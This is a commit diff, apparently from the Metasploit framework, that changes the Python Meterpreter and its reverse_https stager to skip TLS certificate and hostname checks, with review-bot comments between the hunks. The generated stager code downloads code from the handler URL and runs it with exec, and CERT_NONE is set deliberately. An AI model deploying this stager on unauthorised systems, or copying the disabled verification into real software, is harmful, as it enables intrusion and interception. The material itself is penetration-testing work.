
Commit 10e8cef

committed
Pymet dont validate ssl certs for 2.7.9/3.4.3
1 parent a407bc8 commit 10e8cef


2 files changed

+30
-11
lines changed


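--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -393,12 +393,17 @@ def debug_print(self, msg):
 print(msg)
 
 def driver_init_http(self):
+opener_args = []
+scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
+if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
+import ssl
+ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+ssl_ctx.check_hostname=False
+ssl_ctx.verify_mode=ssl.CERT_NONE
+opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
 if HTTP_PROXY:
-scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
-proxy_handler = urllib.ProxyHandler({scheme: HTTP_PROXY})
-opener = urllib.build_opener(proxy_handler)
-else:
-opener = urllib.build_opener()
+opener_args.append(urllib.ProxyHandler({scheme: HTTP_PROXY}))
+opener = urllib.build_opener(*opener_args)
 if HTTP_USER_AGENT:
 opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
 urllib.install_opener(opener)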
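Review bot: The new `if scheme == 'https' and ...` branch in driver_init_http switches certificate and hostname checking off without a comment saying so or explaining the version gate. I would add `# 2.7.9/3.4.3 verify HTTPS certificates by default; this context disables that, so the server is not authenticated` above the `import ssl` line, so a reader knows the transport gives no protection against interception. `urllib.HTTPSHandler(0, ssl_ctx)` would also read more clearly as `urllib.HTTPSHandler(context=ssl_ctx)`, and the two attribute assignments want spaces around `=`. The same version test is repeated in reverse_https.rb, so the two copies need to change together. driver_init_http may continue past the end of the hunk.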

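--- a/modules/payloads/stagers/python/reverse_https.rb
+++ b/modules/payloads/stagers/python/reverse_https.rb
@@ -8,7 +8,7 @@
 
 module Metasploit3
 
-CachedSize = 446
+CachedSize = 742
 
 include Msf::Payload::Stager
 
@@ -55,18 +55,32 @@ def generate
 proxy_host = datastore['PayloadProxyHost'].to_s
 proxy_port = datastore['PayloadProxyPort'].to_i
 
-cmd = "import sys\n"
 if proxy_host == ''
-cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n"
+urllib_fromlist = "['HTTPSHandler','build_opener']"
 else
+urllib_fromlist = "['HTTPSHandler','ProxyHandler','build_opener']"
+end
+
+cmd = "import sys\n"
+cmd << "vi=sys.version_info\n"
+cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n"
+cmd << "hs=[]\n"
+# Context added to HTTPSHandler in 2.7.9 and 3.4.3
+cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n"
+cmd << "\timport ssl\n"
+cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n"
+cmd << "\tsc.check_hostname=False\n"
+cmd << "\tsc.verify_mode=ssl.CERT_NONE\n"
+cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n"
+
+if proxy_host != ''
 proxy_url = Rex::Socket.is_ipv6?(proxy_host) ?
 "http://[#{proxy_host}]:#{proxy_port}" :
 "http://#{proxy_host}:#{proxy_port}"
-
-cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n"
-cmd << "o=ul.build_opener(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n"
+cmd << "hs.append(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n"
 end
 
+cmd << "o=ul.build_opener(*hs)\n"
 cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n"
 cmd << "exec(o.open('#{target_url}').read())\n"
 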
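Review bot: The comment `# Context added to HTTPSHandler in 2.7.9 and 3.4.3` explains the version gate but not that the generated code sets `sc.verify_mode=ssl.CERT_NONE`, which matters because the unchanged last line passes the response straight to `exec(...)`. I would reword it to `# 2.7.9/3.4.3 verify certificates by default; the context below turns that off, so the stage is fetched from an unauthenticated server`. The `CachedSize = 742` bump in the first hunk cannot be checked from the page and should be confirmed against the regenerated payload. generate starts before the second hunk and may continue after it.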
